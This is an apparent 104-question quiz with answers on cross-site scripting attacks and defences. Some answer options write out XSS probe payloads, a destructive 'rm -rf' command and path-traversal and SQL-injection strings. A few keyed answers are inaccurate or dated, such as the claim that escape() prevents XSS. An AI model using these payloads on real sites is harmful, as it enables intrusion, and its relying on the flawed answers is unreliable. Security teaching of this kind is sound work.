1. What is Cross-Site Scripting (XSS)?

A) A method for encrypting web traffic
B) An attack that injects malicious scripts into a website
C) A technique for compressing HTML files
D) A way to improve website performance

Answer: B) An attack that injects malicious scripts into a website
Explanation: XSS allows attackers to inject malicious scripts into web pages viewed by other users, leading to data theft, session hijacking, and defacement.


2. Which of the following is NOT a type of XSS?

A) Stored XSS
B) Reflected XSS
C) DOM-based XSS
D) SQL Injection

Answer: D) SQL Injection
Explanation: SQL Injection is a separate web attack targeting databases, while XSS exploits the way web applications handle user input.


3. How does Stored XSS work?

A) The malicious script is stored permanently on the server and executed when users access the page
B) The script is reflected back to the user from an HTTP request
C) The script modifies the DOM directly from JavaScript execution
D) The script exploits browser cache vulnerabilities

Answer: A) The malicious script is stored permanently on the server and executed when users access the page
Explanation: Stored XSS occurs when the injected script is saved in the application (e.g., database) and runs when a user accesses the affected page.


4. Which of the following is a common example of Reflected XSS?

A) A malicious script saved in a user profile comment section
B) An attack that injects scripts into an email body
C) A script embedded in a URL parameter that executes in a user’s browser when clicked
D) An attack that modifies session cookies

Answer: C) A script embedded in a URL parameter that executes in a user’s browser when clicked
Explanation: Reflected XSS occurs when a script is sent as a part of a request (e.g., URL) and immediately executed in the browser without being stored.


5. Which of the following best describes DOM-based XSS?

A) XSS where the malicious script is stored in a database
B) XSS where the attack is reflected through an HTTP response
C) XSS where JavaScript modifies the DOM without touching the server
D) XSS where the script is embedded in an iframe

Answer: C) XSS where JavaScript modifies the DOM without touching the server
Explanation: DOM-based XSS occurs when JavaScript modifies the page’s DOM dynamically, leading to script execution without sending a request to the server.


6. What is the most effective method to prevent Stored XSS?

A) Using client-side input validation
B) Encoding user inputs before storing them
C) Storing inputs as plain text in a database
D) Allowing only GET requests

Answer: B) Encoding user inputs before storing them
Explanation: Encoding user inputs ensures that stored data is treated as text rather than executable code, preventing script execution.


7. How can Reflected XSS attacks be mitigated?

A) Disabling JavaScript on all web pages
B) Filtering user inputs before reflecting them in responses
C) Storing user inputs in cookies
D) Using weak encryption methods

Answer: B) Filtering user inputs before reflecting them in responses
Explanation: Filtering and validating user inputs prevent malicious scripts from being executed when included in HTTP responses.


8. Which security header helps mitigate XSS attacks?

A) Content-Security-Policy (CSP)
B) X-Powered-By
C) HTTP 404 Header
D) Expires Header

Answer: A) Content-Security-Policy (CSP)
Explanation: CSP restricts sources from which scripts can be executed, reducing the impact of XSS attacks.


9. What is the role of the “innerHTML” property in DOM-based XSS?

A) It prevents JavaScript execution in the browser
B) It allows attackers to inject and execute malicious scripts
C) It converts text into safe HTML elements
D) It filters out JavaScript from user inputs

Answer: B) It allows attackers to inject and execute malicious scripts
Explanation: innerHTML directly inserts HTML content, making it vulnerable to malicious script injection.


10. Which of the following input sanitization methods is effective against XSS?

A) Encoding special characters
B) Replacing all JavaScript code with random strings
C) Converting JavaScript to uppercase
D) Encrypting user input before storing

Answer: A) Encoding special characters
Explanation: Encoding special characters prevents browsers from interpreting input as executable scripts.


11. What does the “HttpOnly” flag in cookies do?

A) Allows JavaScript to access cookies
B) Prevents JavaScript from accessing cookies
C) Encrypts cookies with a password
D) Makes cookies last indefinitely

Answer: B) Prevents JavaScript from accessing cookies
Explanation: The HttpOnly flag prevents JavaScript from accessing cookies, reducing the risk of XSS-based session hijacking.


12. How does JavaScript event handling contribute to XSS?

A) Event handlers like onmouseover can execute injected scripts
B) Event handlers remove all JavaScript from a webpage
C) Event handlers always sanitize user input
D) Event handlers prevent script execution

Answer: A) Event handlers like onmouseover can execute injected scripts
Explanation: JavaScript event handlers can trigger malicious scripts when a user interacts with manipulated elements.


13. Which JavaScript method is dangerous and should be avoided due to XSS risks?

A) console.log()
B) eval()
C) parseInt()
D) toUpperCase()

Answer: B) eval()
Explanation: eval() executes arbitrary JavaScript, making it highly dangerous if used with user input.


14. What is a key difference between Reflected and Stored XSS?

A) Reflected XSS is persistent, while Stored XSS is temporary
B) Stored XSS affects only the attacker, while Reflected XSS affects multiple users
C) Stored XSS is persistent and affects multiple users, while Reflected XSS requires interaction
D) Reflected XSS requires a database to function

Answer: C) Stored XSS is persistent and affects multiple users, while Reflected XSS requires interaction
Explanation: Stored XSS is injected into a system (e.g., a database) and impacts many users, whereas Reflected XSS requires a user to trigger the attack.


15. What is the purpose of escaping HTML entities?

A) To make HTML more readable
B) To ensure scripts execute properly
C) To prevent browsers from interpreting special characters as executable code
D) To remove JavaScript from a webpage

Answer: C) To prevent browsers from interpreting special characters as executable code
Explanation: Escaping converts characters like < and > into their HTML entity equivalents, preventing XSS attacks.


16. Which of the following is the best approach to prevent DOM-based XSS?

A) Using innerHTML for dynamic content updates
B) Using textContent or createTextNode instead of innerHTML
C) Allowing user-generated JavaScript to execute freely
D) Disabling JavaScript in the browser

Answer: B) Using textContent or createTextNode instead of innerHTML
Explanation: textContent and createTextNode safely insert text without executing JavaScript, preventing DOM-based XSS.


17. Which browser security feature helps prevent XSS attacks?

A) Content Security Policy (CSP)
B) Incognito mode
C) Browser extensions
D) Disabling pop-ups

Answer: A) Content Security Policy (CSP)
Explanation: CSP restricts scripts from executing from untrusted sources, reducing the risk of XSS attacks.


18. In Reflected XSS, how does an attacker typically deliver the malicious script to the victim?

A) Through a phishing email or malicious link
B) By injecting it into a stored database
C) By modifying the browser settings
D) Through a mobile app update

Answer: A) Through a phishing email or malicious link
Explanation: Reflected XSS requires user interaction, often by clicking a crafted link with a malicious script.


19. What type of XSS attack would occur if a vulnerable website reflects a malicious script included in a URL?

A) Stored XSS
B) Reflected XSS
C) DOM-based XSS
D) Blind SQL Injection

Answer: B) Reflected XSS
Explanation: In Reflected XSS, the script is injected via a URL and executed immediately without being stored.


20. What is the primary goal of an XSS attack?

A) To slow down a website’s performance
B) To inject malicious scripts that execute in a victim’s browser
C) To encrypt files for ransom
D) To generate spam emails

Answer: B) To inject malicious scripts that execute in a victim’s browser
Explanation: XSS allows attackers to execute malicious JavaScript in the victim’s browser, often leading to data theft or session hijacking.


21. What is the impact of an XSS attack on a website?

A) Unauthorized access to sensitive data
B) Defacement of web pages
C) Session hijacking
D) All of the above

Answer: D) All of the above
Explanation: XSS attacks can steal data, hijack user sessions, and deface websites by modifying the DOM.


22. What does the “SameSite” cookie attribute do?

A) Prevents cookies from being accessed by JavaScript
B) Restricts cookies from being sent in cross-site requests
C) Disables cookies in incognito mode
D) Encrypts cookie data

Answer: B) Restricts cookies from being sent in cross-site requests
Explanation: The SameSite attribute helps prevent cross-site request forgery (CSRF) and some XSS attacks by restricting cookie access.


23. Why is JavaScript’s eval() function dangerous?

A) It executes arbitrary code, making it vulnerable to injection attacks
B) It is slow and inefficient
C) It is deprecated in modern browsers
D) It only works in Internet Explorer

Answer: A) It executes arbitrary code, making it vulnerable to injection attacks
Explanation: eval() should be avoided as it can execute untrusted JavaScript code, leading to XSS vulnerabilities.


24. Which of the following can help prevent XSS attacks?

A) Filtering user input
B) Encoding output before rendering
C) Using security headers like CSP
D) All of the above

Answer: D) All of the above
Explanation: Preventing XSS requires multiple layers of protection, including input validation, output encoding, and security headers.


25. How can a web application validate input to prevent XSS?

A) Allowing all characters in user input
B) Using a predefined allowlist of acceptable characters
C) Converting all user input to uppercase
D) Stripping spaces from user input

Answer: B) Using a predefined allowlist of acceptable characters
Explanation: Allowlisting ensures only expected and safe characters are processed, reducing the risk of malicious script injection.


26. Which of these is a real-world XSS attack?

A) The Stuxnet malware
B) The MySpace Samy Worm
C) The WannaCry ransomware
D) The Heartbleed vulnerability

Answer: B) The MySpace Samy Worm
Explanation: The Samy Worm was a Stored XSS attack that spread across MySpace by exploiting a vulnerability in user profile comments.


27. What is an effective method for securing JavaScript event handlers from XSS attacks?

A) Using inline event handlers
B) Storing scripts in a database
C) Using addEventListener() instead of inline event handlers
D) Allowing user-generated scripts to run freely

Answer: C) Using addEventListener() instead of inline event handlers
Explanation: addEventListener() prevents direct script execution within HTML attributes, reducing XSS risks.


28. How does an attacker steal session cookies using XSS?

A) By executing JavaScript that reads document cookies and sends them to a remote server
B) By sending a phishing email
C) By modifying the HTML structure of the page
D) By changing the user’s password

Answer: A) By executing JavaScript that reads document cookies and sends them to a remote server
Explanation: Attackers inject JavaScript that accesses document.cookie, allowing them to steal session tokens and impersonate users.


29. What is a key reason why some XSS attacks succeed despite input validation?

A) Developers fail to encode output properly
B) Web browsers are insecure
C) Users do not update their operating system
D) XSS is impossible to prevent completely

Answer: A) Developers fail to encode output properly
Explanation: Even if input is validated, failure to encode output properly can still result in XSS execution.


30. Which type of website feature is most commonly targeted for XSS attacks?

A) Static informational pages
B) User-generated content (comments, forums, chat boxes)
C) Image galleries
D) Downloadable PDFs

Answer: B) User-generated content (comments, forums, chat boxes)
Explanation: User input fields that allow text, links, or embedded content are prime targets for Stored XSS attacks.


31. Why is JavaScript’s document.write() method considered insecure?

A) It prevents XSS attacks
B) It allows attackers to inject and execute scripts
C) It removes all malicious scripts from a webpage
D) It automatically encodes input

Answer: B) It allows attackers to inject and execute scripts
Explanation: document.write() inserts raw HTML into a webpage, making it vulnerable to XSS when used improperly with user input.


32. Which XSS attack requires no user interaction for execution?

A) Stored XSS
B) Reflected XSS
C) DOM-based XSS
D) Both B and C

Answer: A) Stored XSS
Explanation: Stored XSS is executed whenever a user loads the affected webpage, without needing interaction like clicking a link.


33. What role do browser security mechanisms like the Same-Origin Policy (SOP) play in preventing XSS?

A) They completely eliminate XSS
B) They prevent cross-site data access but do not prevent XSS
C) They encrypt JavaScript code to prevent execution
D) They disable JavaScript on all web pages

Answer: B) They prevent cross-site data access but do not prevent XSS
Explanation: SOP restricts cross-site requests but does not prevent XSS since the attack occurs within the same origin.


34. How do Content Security Policy (CSP) rules help prevent XSS?

A) By allowing only scripts from trusted sources
B) By disabling JavaScript globally
C) By forcing browsers to ignore all scripts
D) By automatically removing all user input

Answer: A) By allowing only scripts from trusted sources
Explanation: CSP restricts script execution to trusted domains, reducing the chances of running malicious JavaScript.


35. Which tool is commonly used for testing XSS vulnerabilities?

A) Metasploit
B) Burp Suite
C) Nmap
D) Wireshark

Answer: B) Burp Suite
Explanation: Burp Suite is widely used for testing web vulnerabilities, including XSS.


36. What is the function of the X-XSS-Protection header?

A) It completely eliminates XSS vulnerabilities
B) It enables browser-based XSS filters to block malicious scripts
C) It disables JavaScript execution
D) It prevents CSRF attacks

Answer: B) It enables browser-based XSS filters to block malicious scripts
Explanation: The X-XSS-Protection header instructs browsers to stop rendering pages when an XSS attack is detected.


37. In Reflected XSS, where is the malicious payload typically found?

A) In the victim’s local storage
B) In the web server’s database
C) In the HTTP request and response
D) In the browser cache

Answer: C) In the HTTP request and response
Explanation: Reflected XSS occurs when user input is included in an HTTP request and reflected back in the response.


38. Which JavaScript function is commonly exploited in DOM-based XSS attacks?

A) document.getElementById()
B) window.location.href
C) console.log()
D) alert()

Answer: B) window.location.href
Explanation: window.location.href can be manipulated to execute malicious JavaScript in DOM-based XSS.


39. Which of these techniques is NOT an effective way to prevent XSS?

A) Escaping special characters
B) Disabling JavaScript globally
C) Using a Content Security Policy (CSP)
D) Sanitizing user input

Answer: B) Disabling JavaScript globally
Explanation: While disabling JavaScript can prevent XSS, it is not practical as many websites rely on JavaScript for functionality.


40. What is the primary risk of allowing users to input HTML content?

A) It slows down the website
B) It increases storage costs
C) It enables attackers to inject malicious scripts
D) It improves website performance

Answer: C) It enables attackers to inject malicious scripts
Explanation: Allowing users to input raw HTML can lead to XSS if the application does not properly sanitize inputs.


41. What makes CSP more effective in preventing XSS?

A) It allows inline scripts by default
B) It blocks all JavaScript execution
C) It restricts the execution of scripts to trusted sources
D) It removes all user-generated content

Answer: C) It restricts the execution of scripts to trusted sources
Explanation: CSP defines which scripts can run, blocking unauthorized scripts injected via XSS attacks.


42. What is “self-XSS,” and why is it dangerous?

A) A user unknowingly runs an XSS script on themselves
B) A type of stored XSS attack
C) An attack that only affects admins
D) A technique to prevent XSS

Answer: A) A user unknowingly runs an XSS script on themselves
Explanation: Self-XSS tricks users into pasting and executing malicious scripts in their browser’s developer console.


43. Which input validation method is more secure against XSS?

A) Blacklisting dangerous characters
B) Allowlisting only accepted characters
C) Converting all input to uppercase
D) Removing all spaces from input

Answer: B) Allowlisting only accepted characters
Explanation: Allowlisting ensures that only expected and safe characters are allowed, preventing script injections.


44. How do attackers use XSS to steal login credentials?

A) By modifying the page’s CSS
B) By redirecting users to a phishing page
C) By injecting scripts that capture keystrokes and send them to an attacker’s server
D) Both B and C

Answer: D) Both B and C
Explanation: Attackers can redirect users to fake login pages or use scripts to capture input fields and send credentials.


45. Why should developers avoid inline JavaScript when possible?

A) It makes debugging harder
B) It increases the risk of XSS attacks
C) It slows down page rendering
D) It is not supported by modern browsers

Answer: B) It increases the risk of XSS attacks
Explanation: Inline JavaScript can be easily exploited by XSS attacks if an attacker manages to inject malicious content.


46. What does sandboxing JavaScript execution do?

A) Allows JavaScript to run in a restricted environment
B) Blocks all JavaScript execution
C) Encrypts JavaScript files
D) Prevents browsers from caching scripts

Answer: A) Allows JavaScript to run in a restricted environment
Explanation: Sandboxing limits JavaScript’s ability to interact with the browser environment, reducing XSS risks.


47. How does an attacker escalate an XSS attack to gain admin access?

A) By modifying the website’s stylesheet
B) By using JavaScript to steal session cookies
C) By changing the website’s favicon
D) By disabling browser security settings

Answer: B) By using JavaScript to steal session cookies
Explanation: Stolen session cookies allow attackers to impersonate administrators and gain unauthorized access.


48. What happens when a script executes in an XSS attack?

A) The browser crashes
B) The attacker gains remote control of the server
C) The attacker’s script runs in the victim’s browser
D) The browser deletes all cookies

Answer: C) The attacker’s script runs in the victim’s browser
Explanation: XSS allows attackers to execute scripts within a victim’s browser, leading to data theft or account compromise.


49. Why are older web applications more prone to XSS attacks?

A) They use modern security mechanisms
B) They often lack proper input validation and security headers
C) They are less frequently targeted by attackers
D) They have built-in security features

Answer: B) They often lack proper input validation and security headers
Explanation: Older applications may not implement modern security best practices, making them vulnerable.


50. How can JavaScript’s setTimeout() and setInterval() functions contribute to XSS?

A) They prevent scripts from executing
B) They allow delayed execution of injected malicious scripts
C) They block user input
D) They disable cookies

Answer: B) They allow delayed execution of injected malicious scripts
Explanation: Attackers can use setTimeout() and setInterval() to execute XSS payloads after the page has loaded, bypassing some security filters.


51. What is the main difference between Stored XSS and Reflected XSS?

A) Stored XSS is executed immediately, while Reflected XSS is stored in the database
B) Stored XSS is saved on the server and affects multiple users, while Reflected XSS requires user interaction
C) Stored XSS only affects administrators, while Reflected XSS affects regular users
D) There is no difference between Stored XSS and Reflected XSS

Answer: B) Stored XSS is saved on the server and affects multiple users, while Reflected XSS requires user interaction
Explanation: Stored XSS is persistent and impacts all users accessing the affected content, whereas Reflected XSS requires the victim to interact with a maliciously crafted request.


52. Which of the following payloads is a typical example of a Reflected XSS attack?

A) <script>alert('XSS')</script> injected into a search query URL
B) <iframe src="https://malicious-site.com"></iframe> stored in a forum post
C) SQL query altering database records
D) Creating a new user account with admin privileges

Answer: A) <script>alert('XSS')</script> injected into a search query URL
Explanation: In Reflected XSS, the script is injected into a URL parameter and executed when a user clicks the link.


53. What type of input validation should be used to prevent XSS?

A) Blacklisting dangerous keywords
B) Encoding and sanitizing user inputs
C) Converting all input to uppercase
D) Disabling all JavaScript functions

Answer: B) Encoding and sanitizing user inputs
Explanation: Encoding special characters and sanitizing inputs prevent them from being interpreted as executable scripts.


54. Which of the following is a common indicator of an active XSS attack?

A) Website pages loading faster than usual
B) Unexpected pop-ups or redirections
C) Increased CPU usage on the client’s machine
D) Users being logged out of their accounts automatically

Answer: B) Unexpected pop-ups or redirections
Explanation: XSS attacks often inject JavaScript that triggers pop-ups, redirects, or unauthorized actions in the user’s browser.


55. How do web application firewalls (WAFs) help prevent XSS attacks?

A) They block all JavaScript execution in browsers
B) They detect and block malicious requests containing XSS payloads
C) They disable HTML form submissions
D) They store user input in encrypted format

Answer: B) They detect and block malicious requests containing XSS payloads
Explanation: WAFs inspect incoming requests and filter out suspicious patterns associated with XSS attacks.


56. What is the purpose of JavaScript’s escape() function?

A) To execute JavaScript safely in the browser
B) To prevent XSS by encoding special characters
C) To remove all HTML tags from user input
D) To generate random JavaScript code

Answer: B) To prevent XSS by encoding special characters
Explanation: The escape() function encodes special characters to prevent them from being interpreted as HTML or JavaScript.


57. Which of the following is a dangerous practice that can lead to XSS vulnerabilities?

A) Using parameterized queries
B) Allowing users to insert raw HTML without validation
C) Implementing HTTP Strict Transport Security (HSTS)
D) Using two-factor authentication

Answer: B) Allowing users to insert raw HTML without validation
Explanation: Allowing raw HTML input without sanitization can enable attackers to inject malicious scripts.


58. What is “cookie stealing” in the context of an XSS attack?

A) A method of encrypting cookies for security
B) The process of injecting malware into cookies
C) Capturing session cookies via injected JavaScript
D) A feature in modern browsers to protect cookies

Answer: C) Capturing session cookies via injected JavaScript
Explanation: Attackers use JavaScript to read document.cookie and steal session tokens, leading to session hijacking.


59. Why should developers avoid using innerHTML with untrusted data?

A) It makes the page load slower
B) It can execute malicious JavaScript
C) It requires additional memory allocation
D) It only works on specific browsers

Answer: B) It can execute malicious JavaScript
Explanation: innerHTML directly inserts HTML content, allowing XSS payloads to execute if the input is not properly sanitized.


60. What does JavaScript’s textContent method do differently from innerHTML?

A) It prevents JavaScript execution and only sets text
B) It automatically removes all user input
C) It executes embedded JavaScript safely
D) It replaces all characters with asterisks

Answer: A) It prevents JavaScript execution and only sets text
Explanation: Unlike innerHTML, textContent only sets text without parsing it as HTML, making it safer.


61. Which of the following can mitigate the risk of session hijacking due to XSS?

A) Storing session tokens in local storage
B) Setting cookies with the HttpOnly and Secure flags
C) Using client-side session management
D) Encrypting JavaScript files

Answer: B) Setting cookies with the HttpOnly and Secure flags
Explanation: The HttpOnly flag prevents JavaScript from accessing cookies, reducing the risk of theft via XSS.


62. Why is it dangerous to use eval() with user input?

A) It makes JavaScript slower
B) It can execute arbitrary JavaScript code, leading to security risks
C) It automatically converts input into numbers
D) It prevents XSS attacks

Answer: B) It can execute arbitrary JavaScript code, leading to security risks
Explanation: eval() executes any JavaScript passed to it, making it highly vulnerable to XSS attacks.


63. How can attackers bypass input filtering mechanisms?

A) By using encoding techniques like URL encoding or Base64
B) By disabling browser JavaScript
C) By modifying HTML structure
D) By using a VPN

Answer: A) By using encoding techniques like URL encoding or Base64
Explanation: Attackers can encode payloads in different formats to evade input filters and execute XSS.


64. What does the CSP default-src 'none' directive do?

A) It disables JavaScript execution completely
B) It prevents all content from loading unless explicitly allowed
C) It only allows images to load
D) It restricts inline scripts but allows external ones

Answer: B) It prevents all content from loading unless explicitly allowed
Explanation: default-src 'none' blocks all content unless explicitly permitted via other CSP directives.


65. What is “Blind XSS”?

A) An XSS attack that does not immediately reflect back to the attacker
B) A harmless form of XSS
C) A technique used to test for vulnerabilities
D) A server-side filtering mechanism

Answer: A) An XSS attack that does not immediately reflect back to the attacker
Explanation: Blind XSS occurs when a payload is stored and executed later in an admin or reporting panel.


66. Which browser feature helps prevent cross-site scripting attacks?

A) Ad blockers
B) Content Security Policy (CSP)
C) Incognito mode
D) JavaScript minification

Answer: B) Content Security Policy (CSP)
Explanation: CSP helps restrict the execution of untrusted scripts, mitigating XSS attacks.


67. What is the primary risk of allowing user-generated content on a website?

A) Increased storage usage
B) Potential injection of malicious scripts (XSS)
C) Slower website performance
D) Higher bandwidth consumption

Answer: B) Potential injection of malicious scripts (XSS)
Explanation: Allowing user-generated content without proper validation increases the risk of XSS.


68. What is the role of sanitization libraries like DOMPurify?

A) They remove all JavaScript from a website
B) They filter out malicious code from user input
C) They store user input in encrypted format
D) They block all HTML elements

Answer: B) They filter out malicious code from user input
Explanation: Libraries like DOMPurify sanitize HTML inputs to prevent XSS attacks.


69. What is an example of a JavaScript event that can trigger an XSS payload?

A) onclick
B) onmouseover
C) onerror
D) All of the above

Answer: D) All of the above
Explanation: Various JavaScript event handlers can be exploited to trigger XSS payloads.


70. What makes an XSS vulnerability critical?

A) It allows attackers to execute code remotely on a server
B) It enables remote execution of scripts in user browsers
C) It only affects a small number of users
D) It is difficult to exploit

Answer: B) It enables remote execution of scripts in user browsers
Explanation: XSS can be critical because it allows attackers to control a user’s browser session, steal credentials, or manipulate site content.


71. Which of the following best describes a Reflected XSS attack?

A) The script is stored on the server and executed later
B) The malicious script is injected into a database and affects multiple users
C) The script is included in the HTTP request and reflected back in the response
D) The attack targets only mobile applications

Answer: C) The script is included in the HTTP request and reflected back in the response
Explanation: Reflected XSS occurs when a script is sent in a request (like a URL parameter) and immediately reflected back in the response.


72. How does a Content Security Policy (CSP) mitigate XSS attacks?

A) It blocks all JavaScript execution
B) It defines a whitelist of trusted content sources
C) It disables HTML rendering
D) It encrypts all user input

Answer: B) It defines a whitelist of trusted content sources
Explanation: CSP restricts the execution of scripts to predefined trusted sources, reducing the impact of XSS.


73. What makes DOM-based XSS different from other types of XSS?

A) It executes in the victim’s browser without reaching the server
B) It requires the attacker to have admin privileges
C) It modifies the website’s database
D) It only affects desktop browsers

Answer: A) It executes in the victim’s browser without reaching the server
Explanation: In DOM-based XSS, the malicious script modifies the DOM structure directly without being reflected from the server.


74. What is the primary reason attackers use XSS?

A) To slow down the website
B) To execute malicious scripts in a victim’s browser
C) To break SSL encryption
D) To perform SQL Injection

Answer: B) To execute malicious scripts in a victim’s browser
Explanation: XSS is used to inject JavaScript that can steal data, hijack sessions, or manipulate website content.


75. Which of the following input fields is most vulnerable to Stored XSS?

A) Search bars
B) Login forms
C) User comment sections
D) CAPTCHA fields

Answer: C) User comment sections
Explanation: Stored XSS occurs when malicious scripts are saved in a database and executed when users view affected content, like comments.


76. Which JavaScript function should be avoided to prevent XSS?

A) console.log()
B) innerText
C) eval()
D) setTimeout()

Answer: C) eval()
Explanation: eval() executes arbitrary JavaScript and can lead to severe security vulnerabilities if used with user input.


77. How can using HTTP-only cookies help prevent XSS attacks?

A) By encrypting all cookies
B) By preventing JavaScript from accessing cookies
C) By making cookies expire faster
D) By storing cookies on a different server

Answer: B) By preventing JavaScript from accessing cookies
Explanation: HTTP-only cookies are inaccessible to JavaScript, preventing XSS attacks from stealing session tokens.


78. Which of the following is a real-world consequence of XSS attacks?

A) Defacement of websites
B) Theft of sensitive user data
C) Malware distribution
D) All of the above

Answer: D) All of the above
Explanation: XSS can be used to deface websites, steal user data, and distribute malware by injecting malicious scripts.


79. Why is URL encoding used by attackers in XSS payloads?

A) To obfuscate the payload and evade security filters
B) To make the script run faster
C) To reduce the script size
D) To execute SQL commands

Answer: A) To obfuscate the payload and evade security filters
Explanation: Attackers use URL encoding to disguise malicious scripts and bypass security mechanisms.


80. Which of these is an example of an XSS payload?

A) SELECT * FROM users WHERE id=1;
B) <script>alert('XSS')</script>
C) rm -rf /home/user
D) 127.0.0.1:8080

Answer: B) <script>alert('XSS')</script>
Explanation: The <script> tag is commonly used in XSS attacks to execute JavaScript within the victim’s browser.


81. Which of the following can prevent XSS in a web application?

A) Using parameterized queries
B) Encoding user-generated content before displaying it
C) Disabling all JavaScript execution
D) Blocking all user-generated content

Answer: B) Encoding user-generated content before displaying it
Explanation: Encoding user inputs ensures that they are treated as plain text rather than executable scripts.


82. What is a major weakness of blacklist-based XSS prevention?

A) It prevents all types of XSS
B) Attackers can bypass it using encoded or obfuscated payloads
C) It improves website speed
D) It encrypts all user inputs

Answer: B) Attackers can bypass it using encoded or obfuscated payloads
Explanation: Blacklist-based prevention is ineffective as attackers can use encoding techniques to bypass filters.


83. How can JavaScript’s setInterval() function contribute to XSS attacks?

A) It blocks XSS execution
B) It allows repeated execution of malicious scripts
C) It prevents cookies from being stolen
D) It only works with HTML5

Answer: B) It allows repeated execution of malicious scripts
Explanation: Attackers can use setInterval() to repeatedly execute XSS payloads.


84. What is a simple test to check if an input field is vulnerable to XSS?

A) Entering 1=1
B) Entering <script>alert(1)</script>
C) Entering ../../etc/passwd
D) Entering admin' --

Answer: B) Entering <script>alert(1)</script>
Explanation: If an input field allows <script>alert(1)</script> to execute, it is vulnerable to XSS.


85. Why is localStorage risky for storing sensitive data?

A) It does not support large data storage
B) It can be accessed by JavaScript, making it vulnerable to XSS
C) It slows down the browser
D) It encrypts data automatically

Answer: B) It can be accessed by JavaScript, making it vulnerable to XSS
Explanation: localStorage is accessible via JavaScript, so an XSS attack can steal stored data.


86. What type of security testing is most useful for detecting XSS vulnerabilities?

A) Static Application Security Testing (SAST)
B) Network penetration testing
C) Dynamic Application Security Testing (DAST)
D) Social engineering assessments

Answer: C) Dynamic Application Security Testing (DAST)
Explanation: DAST analyzes applications at runtime to detect XSS and other security flaws.


87. What is “Mutation XSS”?

A) An XSS variant that exploits JavaScript frameworks and automatic DOM modifications
B) A form of stored XSS targeting mobile browsers
C) A method of hiding JavaScript payloads in CSS files
D) A technique used to detect XSS vulnerabilities

Answer: A) An XSS variant that exploits JavaScript frameworks and automatic DOM modifications
Explanation: Mutation XSS occurs when the browser modifies inserted content, triggering an unexpected script execution.


88. Which type of web application is at the highest risk of XSS attacks?

A) Applications without JavaScript
B) Static websites
C) Web applications that allow user-generated content
D) Websites using HTTP/2

Answer: C) Web applications that allow user-generated content
Explanation: Websites that allow users to submit comments, reviews, or posts are more susceptible to XSS.


89. Why should developers use security libraries like DOMPurify?

A) To automatically sanitize user input
B) To replace JavaScript with PHP
C) To block all user submissions
D) To remove network security threats

Answer: A) To automatically sanitize user input
Explanation: DOMPurify helps sanitize HTML and prevent XSS vulnerabilities.


90. What is a key takeaway from the MySpace Samy Worm incident?

A) XSS can be used for self-replicating attacks
B) XSS is harmless and only affects cookies
C) JavaScript is not a security risk
D) Websites should allow all HTML input

Answer: A) XSS can be used for self-replicating attacks
Explanation: The MySpace Samy Worm spread automatically by exploiting Stored XSS.


91. What is a potential risk of allowing users to submit JavaScript-based content?

A) Faster page load times
B) Users can modify the UI
C) Increased risk of XSS attacks
D) Improved website security

Answer: C) Increased risk of XSS attacks
Explanation: Allowing users to submit JavaScript-based content without proper validation increases the risk of XSS.


92. Why is Base64 encoding sometimes used by attackers in XSS payloads?

A) To make the script execute faster
B) To bypass security filters that block raw script tags
C) To encrypt user data
D) To prevent JavaScript execution

Answer: B) To bypass security filters that block raw script tags
Explanation: Attackers use Base64 encoding to obfuscate their payloads and evade security mechanisms.


93. Which of the following best describes a Blind XSS attack?

A) The attacker does not see immediate results of the attack
B) The XSS payload is only executed in the victim’s console
C) The attacker needs to manually confirm the execution of the script
D) The attack works only on mobile browsers

Answer: A) The attacker does not see immediate results of the attack
Explanation: Blind XSS occurs when the payload is stored and later executed in an admin panel or another area that the attacker does not directly see.


94. What is a Polyglot XSS payload?

A) A script that works across multiple programming languages
B) A payload that bypasses multiple security filters using different encoding techniques
C) A script that can only run on specific browsers
D) An encrypted JavaScript function

Answer: B) A payload that bypasses multiple security filters using different encoding techniques
Explanation: Polyglot XSS payloads are designed to evade multiple layers of security defenses by using different encoding methods.


95. Which of the following is an example of an event-driven XSS attack?

A) <input type="text" value="XSS">
B) <img src="x" onerror="alert('XSS')">
C) SELECT * FROM users WHERE id=1;
D) https://example.com/login

Answer: B) <img src="x" onerror="alert('XSS')">
Explanation: The onerror event triggers when an image fails to load, making it a common technique for XSS attacks.


96. How can WebSockets be vulnerable to XSS attacks?

A) WebSockets do not support authentication
B) WebSockets can transmit malicious JavaScript if user input is not sanitized
C) WebSockets encrypt all traffic by default
D) WebSockets prevent all types of script injection

Answer: B) WebSockets can transmit malicious JavaScript if user input is not sanitized
Explanation: If input validation is not properly implemented, WebSockets can be used to send and execute malicious scripts.


97. What makes CSP effective against XSS attacks?

A) It disables all JavaScript execution
B) It allows execution only from trusted sources
C) It blocks HTTP requests
D) It removes all user-generated content

Answer: B) It allows execution only from trusted sources
Explanation: CSP restricts the execution of scripts to trusted domains, preventing XSS exploitation.


98. Which browser mechanism helps prevent session hijacking via XSS?

A) Incognito mode
B) HTTP-only cookies
C) Disabling JavaScript
D) Using a VPN

Answer: B) HTTP-only cookies
Explanation: HTTP-only cookies prevent JavaScript from accessing session tokens, reducing the risk of session hijacking through XSS.


99. How does an attacker use a drive-by XSS attack?

A) By requiring user interaction to execute the script
B) By embedding malicious scripts in trusted websites
C) By exploiting vulnerabilities in offline applications
D) By modifying browser settings

Answer: B) By embedding malicious scripts in trusted websites
Explanation: Drive-by XSS occurs when malicious scripts execute automatically when users visit a compromised site.


100. What does the CSP script-src 'self' directive do?

A) Allows scripts only from the same domain
B) Blocks all JavaScript execution
C) Encrypts all script files
D) Allows scripts from all sources

Answer: A) Allows scripts only from the same domain
Explanation: The script-src 'self' CSP directive ensures that JavaScript executes only from the same origin, mitigating XSS risks.


101. What is a key characteristic of a Persistent XSS attack?

A) The malicious script is stored and executed repeatedly when accessed
B) The script executes only once for each victim
C) The script modifies the browser’s security settings
D) It requires manual execution by the attacker

Answer: A) The malicious script is stored and executed repeatedly when accessed
Explanation: Stored XSS persists in the application and executes whenever the affected content is loaded.


102. Which of these input fields is least likely to be exploited for XSS?

A) Comment sections
B) Search bars with unescaped output
C) Password fields
D) Chat messages

Answer: C) Password fields
Explanation: Password fields do not display user input as HTML, making them less vulnerable to XSS.


103. What role does document.write() play in XSS attacks?

A) It prevents JavaScript from executing
B) It allows dynamic content injection, making it vulnerable to XSS
C) It blocks script execution
D) It automatically encodes input

Answer: B) It allows dynamic content injection, making it vulnerable to XSS
Explanation: document.write() inserts content into the DOM dynamically, which can be exploited for XSS if input is not sanitized.


104. How does Clickjacking relate to XSS?

A) It exploits browser vulnerabilities to steal cookies
B) It involves tricking users into clicking hidden elements via iframes
C) It disables JavaScript execution
D) It encrypts web pages

Answer: B) It involves tricking users into clicking hidden elements via iframes
Explanation: Clickjacking tricks users into performing actions by overlaying an invisible UI, sometimes combined with XSS to steal credentials.


